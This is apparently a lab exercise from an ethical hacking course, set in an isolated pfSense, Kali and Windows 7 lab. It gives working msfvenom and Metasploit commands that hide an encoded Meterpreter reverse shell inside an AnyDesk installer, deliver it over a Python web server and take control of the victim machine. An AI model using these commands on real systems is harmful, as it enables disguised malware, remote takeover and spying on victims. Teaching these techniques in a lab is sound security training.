Task 1: Generate a Trojan

Step 1

• Turn on the pfSense, Kali, and Windows 7 machines. Copy the provided AnyDesk installer executable to the Kali machine for payload creation.

Step 2

• Generate a malicious payload using msfvenom and embed a Trojan in an AnyDesk executable that will open a Meterpreter. (Msfvenom was introduced in EH-06.) The command for the payload is msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x /root/Downloads/AnyDesk.exe

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x /root/Downloads/AnyDesk.exe

• The output will be GoodMalware.exe

Step 3

• Set up a listener using Metasploit (introduced in EH-06) via the msfconsole for the reverse connection. Search for multi/handler, which is a generic payload handler.

Step 4

• Fill in the following options for lhost as eht0 and lport 4949. You are setting up a listener. Once it is created, run the exploit.

use exploit/multi/handler
set lport 4949
set lhost eth0
run

Task 2: Execution & Control

Step 1

• In the Kali machine, open another tab to run the Python listening server with Python -m SimpleHTTPServer 80. Download the payload from the Windows 7 machine’s browser by going to the Kali machine’s IP.

Python -m SimpleHTTPServer 80

Step 2

• Execute the file, GoodMalware.exe, and note the connection that was created in the Kali terminal.

Step 3

• Take a screenshot of the Windows 7 with Meterpreter using the screenshot command. The image is saved in the Kali home directory.